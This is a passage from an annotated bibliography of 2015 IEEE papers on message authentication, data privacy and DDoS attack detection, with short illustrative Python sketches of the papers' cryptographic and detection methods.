Abstract: Recently, several Quantum Key Distribution (QKD) networks, such as Tokyo QKD and SECOQC, have been built to evaluate quantum based OTP (One Time Pad) secure communication. As an ideal unconditionally secure technique, OTP requires a key rate equal to the information rate. However, compared with high speed information traffic (Gbps), the key generation rate of QKD is very poor (Kbps). Therefore, in practical QKD networks, it is difficult to support numerous applications and multiple users simultaneously. To address this issue, we argue that it is more practical to provide quality of security instead of OTP in quantum networks. We further propose ASM, an Adaptive Security Selection Mechanism for quantum networks based on the Analytic Hierarchy Process (AHP). In ASM, services can select an appropriate encryption algorithm that satisfies the proper security level and performance metrics under the limit of the key generation rate. We also implement ASM on our RT-QKD platform and evaluate its performance. Experimental results demonstrate that ASM can select the optimal algorithm to meet the requirements of security and performance at an acceptable cost.
Keywords: analytic hierarchy process; data privacy; quantum cryptography; telecommunication security; telecommunication traffic; AHP; ASM; OTP; RT-QKD platform; SECOQC; Tokyo; adaptive security selection mechanism; one time pad; quantum key distribution network; secure communication; Algorithm design and analysis; Analytic hierarchy process; Encryption; Information rates; Quantum computing; Real-time systems; Analytic Hierarchy Process; Quality of security; Quantum Key Distribution (ID#: 16-9202)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7332609&isnumber=7332527

 

Dang Hai Van; Nguyen Dinh Thuc, “A Privacy Preserving Message Authentication Code,” in IT Convergence and Security (ICITCS), 2015 5th International Conference on, vol., no., pp. 1–4, 24–27 Aug. 2015. doi:10.1109/ICITCS.2015.7292927
Abstract: In this paper, we propose a new message authentication code which can preserve the privacy of data. The proposed mechanism supports verifying data integrity from only partial information about the original data. In addition, it is proved to be chosen-message-attack secure and privacy-preserving. We also conduct an experiment to compare its computation cost with a hash message authentication code.
Keywords: cryptography; data integrity; data privacy; message authentication; hash message authentication code; privacy of data; privacy preserving message authentication code; Cryptography; Data privacy; Memory; Message authentication; Privacy; Servers (ID#: 16-9203)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292927&isnumber=7292885

 

Backes, M.; Barbosa, M.; Fiore, D.; Reischuk, R.M., “ADSNARK: Nearly Practical and Privacy-Preserving Proofs on Authenticated Data,” in Security and Privacy (SP), 2015 IEEE Symposium on, vol., no., pp. 271–286, 17–21 May 2015. doi:10.1109/SP.2015.24
Abstract: We study the problem of privacy-preserving proofs on authenticated data, where a party receives data from a trusted source and is requested to prove computations over the data to third parties in a correct and private way, i.e., The third party learns no information on the data but is still assured that the claimed proof is valid. Our work particularly focuses on the challenging requirement that the third party should be able to verify the validity with respect to the specific data authenticated by the source — even without having access to that source. This problem is motivated by various scenarios emerging from several application areas such as wearable computing, smart metering, or general business-to-business interactions. Furthermore, these applications also demand any meaningful solution to satisfy additional properties related to usability and scalability. In this paper, we formalize the above three-party model, discuss concrete application scenarios, and then we design, build, and evaluate ADSNARK, a nearly practical system for proving arbitrary computations over authenticated data in a privacy-preserving manner. ADSNARK improves significantly over state-of-the-art solutions for this model. For instance, compared to corresponding solutions based on Pinocchio (Oakland’13), ADSNARK achieves up to 25x improvement in proof-computation time and a 20x reduction in prover storage space.
Keywords: computational complexity; cryptography; data privacy; message authentication; trusted computing; ADSNARK; authenticated data; general business-to-business interactions; privacy-preserving proofs; proof-computation time; prover storage space; scalability; smart metering; third party; three-party model; trusted source; usability; wearable computing; Computational modeling; Cryptography; Data privacy; Logic gates; Polynomials; Wires; authentication; privacy (ID#: 16-9204)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7163031&isnumber=7163005

 

Alshinina, R.; Elleithy, K., “An Efficient Message Authentication and Source Privacy with a Hidden Generator Point Based on ECC,” in Systems, Applications and Technology Conference (LISAT), 2015 IEEE Long Island, vol., no., pp. 1–6, 1–1 May 2015. doi:10.1109/LISAT.2015.7160220
Abstract: Wireless sensor networks have been widely used by researchers in different personal and organizational applications. Recently, WSNs have become a major focus of researchers seeking to establish a secure network against malicious nodes. The security of a WSN can be subjected to threats by attackers. In order to limit these threats on WSNs, Elliptic Curve Cryptography (ECC) introduces great features such as smaller key sizes, fewer parameters, and higher strength compared with RSA and other public key algorithms. In this paper, we propose an ECC based approach using a unique authentication message and source privacy through a hidden generator point. This scheme contains an initialization phase, a registration phase, and an authentication phase. These phases were introduced to develop an efficient algorithm, decrease the overhead, and increase the authentication between nodes. The scheme allows many nodes to transfer unlimited messages without any imposed threshold and guarantees message source privacy.
Keywords: data privacy; message authentication; public key cryptography; wireless sensor networks; ECC; WSN security; authentication phase; elliptic curve cryptography; hidden generator point; initialization phase; malicious node; message source privacy; registration phase; secure network; unique authentication message; wireless sensor networks; Authentication; Elliptic curve cryptography; Generators; Protocols; Receivers; Wireless sensor networks; Anonymous Message. Hidden Generator Point; Authentication; Elliptic curve (EC); Initialization; Registration; Secure Privacy; Shared Secret key; Wireless Sensor Network (WSN) (ID#: 16-9205)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160220&isnumber=7160171

 

Yunpeng Xiao; Yaru Zhang, “Secure Top-K Query Scheme in Wireless Sensor Networks,” in Software Engineering and Service Science (ICSESS), 2015 6th IEEE International Conference on, vol., no., pp. 516–519, 23–25 Sept. 2015. doi:10.1109/ICSESS.2015.7339110
Abstract: Data privacy preservation in wireless sensor networks has attracted more and more attention. This paper proposes a secure top-k query scheme in wireless sensor networks (STQ). STQ uses symmetric encryption to preserve data privacy. To verify the completeness of query results, STQ uses an improved hashed message authentication coding function to create a chaining relationship by binding ordered adjacent data. Theoretical analysis and simulation results confirm the security and efficiency of STQ.
Keywords: cryptography; data privacy; query processing; wireless sensor networks; STQ; data privacy; improved hashed message authentication coding function; secure top-k query scheme; symmetric encryption; wireless sensor networks; Top-k query; Wireless sensor networks; data privacy preserving; improved hashed message authentication coding (ID#: 16-9206)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7339110&isnumber=7338993
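The chaining relationship STQ builds, binding ordered adjacent data with an HMAC, can be illustrated with the stdlib alone; the key handling, encryption layer, and exact message format below are simplifications:

```python
import hashlib, hmac

KEY = b"sensor-shared-key"

def mac(msg: bytes) -> bytes:
    return hmac.new(KEY, msg, hashlib.sha256).digest()

def chain(readings):
    """Bind each reading to its ordered neighbor so that a silently
    dropped item breaks the chain and incompleteness is detectable."""
    readings = sorted(readings, reverse=True)
    nexts = readings[1:] + [None]
    return [(cur, mac(f"{cur}|{nxt}".encode()))
            for cur, nxt in zip(readings, nexts)]

def verify_topk(tags, k):
    for i, (val, tag) in enumerate(tags[:k]):
        nxt = tags[i + 1][0] if i + 1 < len(tags) else None
        if not hmac.compare_digest(tag, mac(f"{val}|{nxt}".encode())):
            return False
    return True

tags = chain([17, 42, 8, 23, 35])
print(verify_topk(tags, k=3))                   # True
print(verify_topk(tags[:1] + tags[2:], k=3))    # False: an item was dropped
```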

 

Surv, N.; Wanve, B.; Kamble, R.; Patil, S.; Katti, J., “Framework for Client Side AES Encryption Technique in Cloud Computing,” in Advance Computing Conference (IACC), 2015 IEEE International, vol., no., pp. 525–528, 12–13 June 2015. doi:10.1109/IADCC.2015.7154763
Abstract: Nowadays, cloud computing is the most popular network paradigm in the world. Cloud computing provides resource sharing and online data storage for end users. In existing cloud computing systems there are many security issues, so security becomes an essential part for the data which is stored in the cloud. To solve this problem we have proposed this paper. This paper presents a client side AES encryption and decryption technique using a secret key. AES encryption and decryption is a highly secure and fast technique. Client side encryption is an effective approach to provide security for transmitted data and stored data. This paper proposes user authentication to secure the data of the encryption algorithm within cloud computing. Cloud computing allows users to use a browser without application installation and access their data on any computer using a browser. This infrastructure guarantees the security of the information in the cloud server.
Keywords: cloud computing; message authentication; private key cryptography; resource allocation; storage management; client side AES decryption; client side AES encryption technique; cloud computing systems; cloud server; online data storage; resource sharing; secret key; security issues; user authentication; Ciphers; Cloud computing; Data privacy; Databases; Encryption; AES Algorithm; Cloud Computing; Cloud Security; Cryptography (ID#: 16-9207)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7154763&isnumber=7154658
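
As a rough illustration of client-side encryption before upload, the sketch below uses the widely available Python cryptography package with AES in authenticated GCM mode; the abstract does not specify the mode or key management, so those choices are assumptions.

import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)   # kept client-side, never uploaded
aesgcm = AESGCM(key)

def encrypt_for_cloud(plaintext: bytes, user_id: bytes) -> bytes:
    nonce = os.urandom(12)                  # 96-bit nonce, unique per message
    # user_id as associated data ties the ciphertext to the authenticated user
    return nonce + aesgcm.encrypt(nonce, plaintext, user_id)

def decrypt_from_cloud(blob: bytes, user_id: bytes) -> bytes:
    nonce, ct = blob[:12], blob[12:]
    return aesgcm.decrypt(nonce, ct, user_id)   # raises if blob was tampered with

blob = encrypt_for_cloud(b"confidential report", b"alice@example.com")
print(decrypt_from_cloud(blob, b"alice@example.com"))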

 

Thomas, M.; Panchami, V., “An Encryption Protocol for End-to-End Secure Transmission of SMS,” in Circuit, Power and Computing Technologies (ICCPCT), 2015 International Conference on, vol., no., pp. 1–6, 19–20 March 2015. doi:10.1109/ICCPCT.2015.7159471
Abstract: Short Message Service (SMS) is a process for transmitting short messages over the network. SMS is used in daily-life applications including mobile commerce, mobile banking, and so on. It is a robust communication channel for transmitting information and follows a store-and-forward approach to message delivery. Private information such as passwords, account numbers, passport numbers, and license numbers is also sent by message. The traditional messaging service does not provide security for the message, since the information contained in the SMS travels as plain text from one mobile phone to another. This paper explains an efficient encryption protocol for securely transmitting confidential SMS from one mobile user to another, serving the cryptographic goals of confidentiality, authentication, and integrity. The Blowfish encryption algorithm gives confidentiality to the message, the EasySMS protocol is used to gain authentication, and the MD5 hashing algorithm helps achieve message integrity. The Blowfish algorithm uses less battery power than other encryption algorithms. The protocol prevents various attacks, including SMS disclosure, replay attack, man-in-the-middle attack, and over-the-air modification.
Keywords: cryptographic protocols; data integrity; data privacy; electronic messaging; message authentication; mobile radio; Blowfish encryption algorithm; SMS disclosure; encryption protocol; end-to-end secure transmission; man-in-the middle attack; message authentication; message confidentiality; message integrity; mobile phone; over the air modification; replay attack; short message service; Authentication; Encryption; Mobile communication; Protocols; Throughput; Asymmetric Encryption; Cryptography; Secure Transmission; Symmetric Encryption (ID#: 16-9208)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7159471&isnumber=7159156
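
A minimal sketch of the abstract's recipe (Blowfish for confidentiality plus an MD5 digest for integrity) can be put together with PyCryptodome and hashlib; the key, mode, and message layout are assumptions, and the EasySMS authentication step is omitted. Note that MD5 is considered weak by modern standards; it appears here only because the paper uses it.

import hashlib, os
from Crypto.Cipher import Blowfish
from Crypto.Util.Padding import pad, unpad

KEY = b"shared-sms-key-16"   # hypothetical pre-shared key (4-56 bytes allowed)

def protect_sms(text: str) -> bytes:
    digest = hashlib.md5(text.encode()).digest()        # 16-byte integrity tag
    iv = os.urandom(Blowfish.block_size)                # 8-byte IV
    cipher = Blowfish.new(KEY, Blowfish.MODE_CBC, iv)
    body = pad(digest + text.encode(), Blowfish.block_size)
    return iv + cipher.encrypt(body)

def open_sms(blob: bytes) -> str:
    iv, ct = blob[:Blowfish.block_size], blob[Blowfish.block_size:]
    cipher = Blowfish.new(KEY, Blowfish.MODE_CBC, iv)
    body = unpad(cipher.decrypt(ct), Blowfish.block_size)
    digest, text = body[:16], body[16:]
    if hashlib.md5(text).digest() != digest:
        raise ValueError("SMS integrity check failed")
    return text.decode()

print(open_sms(protect_sms("PIN 4321, do not share")))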

 

Govinda, K.; Prasanna, S., “A Generic Image Cryptography Based on Rubik’s Cube,” in Soft-Computing and Networks Security (ICSNS), 2015 International Conference on, vol., no., pp. 1–4, 25–27 Feb. 2015. doi:10.1109/ICSNS.2015.7292383
Abstract: Security is one of the core areas of study in the IT industry. In this era, where our information represents us, information security is no longer a simple non-functional requirement. In order to define and determine security trends and techniques for the evolving data that impacts our lives every day, this paper defines and designs procedures and schemes that provide privacy, security, and authentication for data that flows through the network, is stored in the cloud, and is available everywhere, all the time, serving users by fulfilling their requirements.
Keywords: cloud computing; cryptography; data privacy; image processing; message authentication; storage management; IT industry; Rubik’s cube; authenticated data; cloud storage; data security; generic image cryptography; information security; nonfunctional requirement; Chaotic communication; Ciphers; Encryption; Signal processing algorithms; Cryptography; Decryption; Encryption; Game of life; Rubik’s Cube (ID#: 16-9209)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7292383&isnumber=7292366
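
The Rubik's-cube flavor of image scrambling can be illustrated by rotating rows and columns of the pixel matrix by key-derived amounts, much like twisting cube layers; the sketch below shows only this general idea and its reversibility, not the paper's exact scheme (its Game-of-Life component is not reproduced).

import numpy as np

def scramble(img: np.ndarray, row_key, col_key, inverse=False):
    """Rotate each row i by row_key[i] and each column j by col_key[j]."""
    out = img.copy()
    sign = -1 if inverse else 1
    if not inverse:
        for i, k in enumerate(row_key):
            out[i, :] = np.roll(out[i, :], sign * k)
        for j, k in enumerate(col_key):
            out[:, j] = np.roll(out[:, j], sign * k)
    else:                                   # undo the twists in reverse order
        for j, k in enumerate(col_key):
            out[:, j] = np.roll(out[:, j], sign * k)
        for i, k in enumerate(row_key):
            out[i, :] = np.roll(out[i, :], sign * k)
    return out

rng = np.random.default_rng(seed=42)        # the seed plays the role of the key
img = rng.integers(0, 256, size=(8, 8), dtype=np.uint8)
row_key = rng.integers(1, 8, size=8)
col_key = rng.integers(1, 8, size=8)

cipher_img = scramble(img, row_key, col_key)
restored = scramble(cipher_img, row_key, col_key, inverse=True)
assert np.array_equal(img, restored)        # the scrambling is fully reversible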

 

Fan Yan; Yang Jian-Wen; Cheng Lin, “Computer Network Security and Technology Research,” in Measuring Technology and Mechatronics Automation (ICMTMA), 2015 Seventh International Conference on, vol., no., pp. 293–296, 13–14 June 2015. doi:10.1109/ICMTMA.2015.77
Abstract: The rapid development of computer network systems brings both great convenience and new security threats for users. The network security problem generally includes network system security and data security; specifically, it refers to the reliability of the network system and the confidentiality, integrity, and availability of data information in the system. Network security problems exist throughout all the layers of the computer network, and the network security objective is to maintain the confidentiality, authenticity, integrity, dependability, availability, and auditability of the network. This paper introduces the main network security technologies in detail, including authentication, data encryption technology, firewall technology, intrusion detection systems (IDS), antivirus technology, and virtual private networks (VPN). The network security problem concerns every network user, so we should place a high value on network security, try to prevent hostile attacks, and ensure network security.
Keywords: computer viruses; cryptography; data integrity; data privacy; firewalls; message authentication; IDS; VPN; antivirus technology; authentication; computer network security; data encryption technology; data information availability; data information confidentiality; data information integrity; data security; firewall technology; hostile attack prevention; intrusion detection system; network system reliability; technology research; virtual private network; Authentication; Communication networks; Encryption; Firewalls (computing); Virtual private networks; Firewall; Intrusion Detection System; Network Security (ID#: 16-9210)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7263569&isnumber=7263490

 

Kester, Q.-A.; Nana, L.; Pascu, A.C.; Gire, S.; Eghan, J.M.; Quaynor, N.N., “A Security Technique for Authentication and Security of Medical Images in Health Information Systems,” in Computational Science and Its Applications (ICCSA), 2015 15th International Conference on, vol., no., pp. 8–13, 22–25 June 2015. doi:10.1109/ICCSA.2015.8
Abstract: Medical images stored in health information systems, clouds, or other systems are of key importance. Privacy and security need to be guaranteed for such images through encryption and authentication processes. Encrypted and watermarked images in this domain need to be reversible so that the plain image operated on during encryption and watermarking can be fully recovered, owing to the sensitivity of the data conveyed in medical images. In this paper, we propose a fully recoverable encrypted and watermarked image processing technique for the security of medical images in health information systems. The approach is used to authenticate and secure the medical images. Our results show the method to be very effective and reliable, with fully recoverable images.
Keywords: cryptography; image watermarking; medical image processing; medical information systems; message authentication; authentication process; encrypted image; encryption process; health information system; medical image authentication; medical image security; security technique; watermarked image; watermarking process; Encryption; Information systems; Magnetic resonance imaging; Medical diagnostic imaging; authentication; health information systems; medical images; recoverable; security (ID#: 16-9211)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166157&isnumber=7166063

 

Khan, M.F.F.; Sakamura, K., “Fine-Grained Access Control to Medical Records in Digital Healthcare Enterprises,” in Networks, Computers and Communications (ISNCC), 2015 International Symposium on, vol., no., pp. 1–6, 13–15 May 2015. doi:10.1109/ISNCC.2015.7238590
Abstract: Adopting IT as an integral part of business and operation is certainly making the healthcare industry more efficient and cost-effective. With the widespread digitalization of personal health information, coupled with the big data revolution and advanced analytics, security and privacy related to medical data — especially ensuring authorized access thereto — is facing a huge challenge. In this paper, we argue that a fine-grained approach is needed for developing access control mechanisms contingent upon various environmental and application-dependent contexts, along with provision for secure delegation of access-control rights. In particular, we propose a context-sensitive approach to access control, building on conventional discretionary access control (DAC) and role-based access control (RBAC) models. Taking a holistic view of access control, we effectively address the precursory authentication part as well. The eTRON architecture — which advocates the use of tamper-resistant chips equipped with functions for mutual authentication and encrypted communication — is used for authentication and for implementing the DAC-based delegation of access-control rights. For realizing authorization and access decisions, we used the RBAC model and implemented context verification on top of it. Our approach closely follows regulatory and technical standards of the healthcare domain. Evaluation of the proposed system in terms of various security and performance metrics showed promising results.
Keywords: authorisation; cryptography; health care; medical computing; message authentication; DAC-based delegation; RBAC models; access decision; advanced analytics; application-dependent contexts; authorization; big data revolution; context verification; context-sensitive approach; digital healthcare enterprises; discretionary access control models; eTRON architecture; encrypted communication; environmental contexts; fine-grained access control; healthcare industry; medical records; mutual authentication; personal health information; precursory authentication; regulatory standards; role-based access control models; technical standards; Authentication; Authorization; Context; Cryptography; Medical services; DAC; RBAC; access control; authentication; context-awareness; eTRON; healthcare enterprise; security (ID#: 16-9212)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7238590&isnumber=7238567
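
The context-sensitive RBAC idea reads roughly as follows: a role grants a permission only when the environmental context also checks out. The roles, context attributes, and verification rule below are illustrative assumptions, not the paper's eTRON-based implementation.

from dataclasses import dataclass

ROLE_PERMISSIONS = {
    "physician": {"read_record", "write_record"},
    "nurse": {"read_record"},
}

@dataclass
class Context:
    hour: int          # 0-23, local time of the request
    on_premises: bool  # request originates inside the hospital network

def context_ok(ctx: Context) -> bool:
    """Example context rule: access only on-site during working hours."""
    return ctx.on_premises and 7 <= ctx.hour <= 19

def access_allowed(role: str, permission: str, ctx: Context) -> bool:
    return permission in ROLE_PERMISSIONS.get(role, set()) and context_ok(ctx)

print(access_allowed("nurse", "read_record", Context(10, True)))     # True
print(access_allowed("nurse", "write_record", Context(10, True)))    # False
print(access_allowed("physician", "read_record", Context(23, True))) # False: off-hours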
 


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Distributed Denial of Service Attack Detection 2015

 

 
SoS Logo

Distributed Denial of Service Attack Detection

2015

 

Distributed Denial of Service Attacks (DDoS) continue to be among the most prolific forms of attack against information systems. According to the NSFOCUS DDoS Threat Report 2013 released on March 25, 2014, DDoS attacks occur at the rate of 28 per hour. (See: http://en.nsfocus.com/2014/SecurityReport_0320/165.html). Research into methods of response and mitigation is also substantial, as the articles presented here show. This work was presented in 2015.



Saboor, A.; Aslam, B., “Analyses of Flow Based Techniques to Detect Distributed Denial of Service Attacks,” in Applied Sciences and Technology (IBCAST), 2015 12th International Bhurban Conference on, vol., no., pp. 354–362, 13–17 Jan. 2015. doi:10.1109/IBCAST.2015.7058529
Abstract: Distributed Denial of Service (DDoS) attacks consist of sending huge volumes of network traffic to a victim system from multiple systems. Detecting such attacks has gained much attention in the current literature. Studies have shown that flow-based anomaly detection mechanisms give promising results compared with typical signature-based attack detection mechanisms, which have not been able to detect such attacks effectively. For this purpose, a variety of flow-based DDoS detection algorithms have been put forward. We have divided flow-based DDoS attack detection techniques broadly into two categories: packet-header based and mathematical-formulation based. Analysis has been done for two techniques, one belonging to each category. The paper analyzes and evaluates these with respect to their detection accuracy and capability. Finally, we suggest improvements that can help produce results better than both of the previously proposed algorithms. Furthermore, our findings can be applied to DDoS detection systems to refine their detection capability.
Keywords: computer network security; mathematical analysis; telecommunication traffic; flow-based anomaly detection mechanisms; flow-based distributed denial of service attack detection techniques; mathematical formulation; multiple systems; network traffic; packet header; signature based attack detection mechanisms; victim system; Correlation; Correlation coefficient; IP networks; Distributed Denial of Service Attack; Exploitation Tools; Flow-based attack detection; Intrusion Detection; cyber security (ID#: 16-9083)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7058529&isnumber=7058466

 

Katkar, V.; Zinjade, A.; Dalvi, S.; Bafna, T.; Mahajan, R., “Detection of DoS/DDoS Attack Against HTTP Servers Using Naive Bayesian,” in Computing Communication Control and Automation (ICCUBEA), 2015 International Conference on, vol., no., pp. 280–285, 26–27 Feb. 2015. doi:10.1109/ICCUBEA.2015.60
Abstract: With the growth of e-commerce and the availability of resources over the Internet, the number of attacks on the servers providing these services and resources has also increased. Denial of Service and Distributed Denial of Service are the most widely launched attacks against such servers, aimed at preventing legitimate users from accessing their services. This paper presents an architecture for an offline signature-based Network Intrusion Detection System that detects Denial/Distributed Denial of Service attacks against HTTP servers using distributed processing and a Naïve Bayesian classifier. Experimental results are provided to demonstrate the efficiency of the proposed architecture.
Keywords: Bayes methods; Internet; computer network security; digital signatures; file servers; pattern classification; transport protocols; DoS-DDoS attack detection; HTTP servers; Naïve Bayesian classifier; denial of service attack; distributed denial of service attack; distributed processing; e-commerce; offline signature based network intrusion detection system; Accuracy; Computer crime; Intrusion detection; Telecommunication traffic; Web servers; Denial of service attack; Naive Bayesian; Network Intrusion Detection System (ID#: 16-9084)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7155851&isnumber=7155781
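
As a rough illustration of the classification step, the sketch below trains scikit-learn's Gaussian Naive Bayes on toy per-window flow features; the features and data are assumptions, since the paper works on real HTTP server traffic with its own feature set.

import numpy as np
from sklearn.naive_bayes import GaussianNB

# columns: packets/sec, SYN ratio, distinct source IPs in the window
X_train = np.array([
    [120,  0.10,   40],   # benign traffic windows
    [150,  0.12,   55],
    [9000, 0.95, 2500],   # DDoS traffic windows
    [8000, 0.90, 1800],
])
y_train = np.array([0, 0, 1, 1])   # 0 = benign, 1 = attack

clf = GaussianNB().fit(X_train, y_train)
window = np.array([[7500, 0.88, 2100]])
print("attack" if clf.predict(window)[0] else "benign")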

 

Nurohman, H.; Purwanto, Y.; Hafidudin, “Traffic Anomaly Based Detection: Anomaly Detection by Self-Similar Analysis,” in Control, Electronics, Renewable Energy and Communications (ICCEREC), 2015 International Conference on, vol., no., pp. 1–6, 27–29 Aug. 2015. doi:10.1109/ICCEREC.2015.7337024
Abstract: Denial of Service (DoS) has been a hot topic lately. The intensity of DoS attacks increases every day, along with a newer attack of the same type: the Distributed Denial of Service (DDoS) attack. Both attack victims by flooding large numbers of packets into the traffic channels at once. This chokes the flow of packets to the victim, which does not receive the desired packets because of the traffic density on its network. Traffic-anomaly based detection is a good technique for detecting DDoS attacks, and it can use several methods. One of them is self-similarity, which suits the behaviour of network traffic. Self-similarity is a form of scale invariance: a plot of the traffic shows the same structure even at different time scales, and self-similarity has become a dominant framework for modelling network traffic. We use the Kolmogorov-Smirnov test to differentiate anomalous from normal conditions at each step of the self-similarity analysis: under normal conditions the test gives 0 (the analysed data do not differ greatly), while under anomalous conditions it gives 1 (the data differ greatly). The Hurst estimator gives 0.645 for the normal condition and 1.443 for the anomalous condition. This is consistent with previous research stating that the Hurst exponent of normal traffic lies in the range 0.5 < H < 1, while anomalous traffic falls outside that range.
Keywords: computer network security; statistical testing; telecommunication traffic; DDoS attack detection; Hurst estimator; Kolmogorv-Smirnov test; anomaly condition; distributed denial of service; network traffic behaviour; network traffic modelling; packets flow; self-similar analysis; self-similarity methods; traffic anomaly based detection; traffic channels; Computer crime; Computers; Estimation; Internet; Mathematical model; Renewable energy sources; Telecommunication traffic; Anomaly; DDoS; Self-Similarity; burstiness (ID#: 16-9085)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7337024&isnumber=7337022
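
The two checks the abstract describes can be approximated with SciPy and NumPy: a two-sample Kolmogorov-Smirnov test between traffic windows and a Hurst-exponent estimate. The aggregated-variance estimator below is a common stand-in, since the abstract does not state which estimator the authors use, and the synthetic data are assumptions.

import numpy as np
from scipy.stats import ks_2samp

def hurst_aggvar(series, scales=(1, 2, 4, 8, 16)):
    """Aggregated-variance Hurst estimate: var(X^(m)) ~ m^(2H-2)."""
    variances = []
    for m in scales:
        n = len(series) // m
        agg = series[: n * m].reshape(n, m).mean(axis=1)  # block means of size m
        variances.append(agg.var())
    slope = np.polyfit(np.log(scales), np.log(variances), 1)[0]
    return 1 + slope / 2

rng = np.random.default_rng(0)
normal = rng.poisson(100, 4096).astype(float)                  # stand-in traffic
flood = normal + rng.choice([0.0, 900.0], 4096, p=[0.7, 0.3])  # flooded window

stat, pvalue = ks_2samp(normal, flood)
print(f"KS p-value: {pvalue:.3g}")   # tiny p-value: the windows differ (flag = 1)
# Note: this iid toy data gives H near 0.5; real traffic with long-range
# dependence lies in 0.5 < H < 1, and the paper reports H outside that
# range under attack.
print(f"H(normal) = {hurst_aggvar(normal):.3f}")
print(f"H(flood)  = {hurst_aggvar(flood):.3f}")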

 

Rui Wang; Zhiping Jia; Lei Ju, “An Entropy-Based Distributed DDoS Detection Mechanism in Software-Defined Networking,” in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, no., pp. 310–317, 20–22 Aug. 2015. doi:10.1109/Trustcom.2015.389
Abstract: Software-Defined Networking (SDN) and the OpenFlow (OF) protocol have brought a promising architecture for future networks. However, centralized control and programmable characteristics also bring many security challenges. The distributed denial-of-service (DDoS) attack remains a security threat to SDN. To detect DDoS attacks in SDN, many studies collect the flow tables from the switch and perform anomaly detection in the controller, but in a large-scale network the collection process burdens the communication between the switches and the controller. Sampling technology may relieve this load, but it introduces a new tradeoff between sampling rate and detection accuracy. In this paper, we first extend a copy of the packet-number counter of the flow entry in the OpenFlow table. Based on the flow-based nature of SDN, we design a flow statistics process in the switch. Then, we propose an entropy-based lightweight DDoS flooding attack detection model running in the OF edge switch. This achieves distributed anomaly detection in SDN and reduces the flow collection overhead on the controller. We also give the detailed algorithm, which has a small computational overhead and can be easily implemented in SDN software or a programmable switch, such as Open vSwitch or NetFPGA. The experimental results show that our detection mechanism can detect attacks quickly and achieve high detection accuracy with a low false positive rate.
Keywords: computer network security; protocols; software defined networking; DDoS attack; NetFPGA; OF edge switch; OF protocol; Open vSwitch; OpenFlow table; SDN; SDN software; anomaly detection; centralized control; communication overload; distributed DDoS detection mechanism; distributed anomaly detection; distributed denial-of-service; flow collection overload; flow statistics process; flow tables; large scale network; lightweight DDoS flooding attack detection model; packet number counter; programmable characteristics; programmable switch; sampling technology; security threat; software-defined networking; Computer architecture; Computer crime; Image edge detection; Radiation detectors; Switches; DDoS; Entropy; OpenFlow (ID#: 16-9086)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345297&isnumber=7345233
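
The core of entropy-based flooding detection at an edge switch can be stated in a few lines: compute Shannon entropy over per-destination packet counters from the flow table and flag windows whose entropy collapses, indicating traffic concentrating on a victim. The counter values and threshold below are illustrative assumptions.

import math
from collections import Counter

def shannon_entropy(counts):
    total = sum(counts)
    return -sum((c / total) * math.log2(c / total) for c in counts if c)

def check_window(dst_packet_counts, threshold=1.0):
    """dst_packet_counts: packets per destination seen in the flow table."""
    h = shannon_entropy(list(dst_packet_counts.values()))
    return ("ATTACK" if h < threshold else "normal", h)

normal = Counter({"10.0.0.1": 40, "10.0.0.2": 35, "10.0.0.3": 30})
flood = Counter({"10.0.0.1": 5, "10.0.0.2": 4, "10.0.0.9": 900})   # one victim

print(check_window(normal))   # ('normal', ~1.58 bits)
print(check_window(flood))    # ('ATTACK', entropy collapses toward 0)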

 

Sharma, S.; Sahu, S.K.; Jena, S.K., “On Selection of Attributes for Entropy Based Detection of DDoS,” in Advances in Computing, Communications and Informatics (ICACCI), 2015 International Conference on, vol., no., pp. 1096–1100, 10–13 Aug. 2015. doi:10.1109/ICACCI.2015.7275756
Abstract: A Distributed Denial of Service (DDoS) attack is an attempt to prevent legitimate users from using services offered by service providers, accomplished by flooding their servers with unnecessary traffic. These attacks have been performed on prestigious web sites such as Yahoo and Amazon and on various cloud service providers. The severity of the attack is very high: the server can go down for an indefinite period of time. Various methods have been proposed to detect such attempts. In this paper, an entropy-based approach is used to detect the DDoS attack. We have analyzed the effect of a DDoS attack on the entropy of all the useful packet attributes and tested their usefulness against well-known types of distributed denial of service attacks. Based on this analysis, we explain the proper choice of attributes one should make to obtain a better threshold during DDoS detection.
Keywords: computer network security; entropy; Amazon; DDoS attack; Web sites; Yahoo; attribute selection; cloud service providers; distributed denial of service attack; entropy based detection; Computer crime; Entropy; Floods; IP networks; Ports (Computers); Protocols; Servers; Attributes Selection; DDoS; SYN Flood (ID#: 16-9087)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7275756&isnumber=7275573

 

Yadav, S.; Selvakumar, S., “Detection of Application Layer DDoS Attack by Modeling User Behavior Using Logistic Regression,” in Reliability, Infocom Technologies and Optimization (ICRITO) (Trends and Future Directions), 2015 4th International Conference on, vol., no., pp. 1–6, 2–4 Sept. 2015. doi:10.1109/ICRITO.2015.7359289
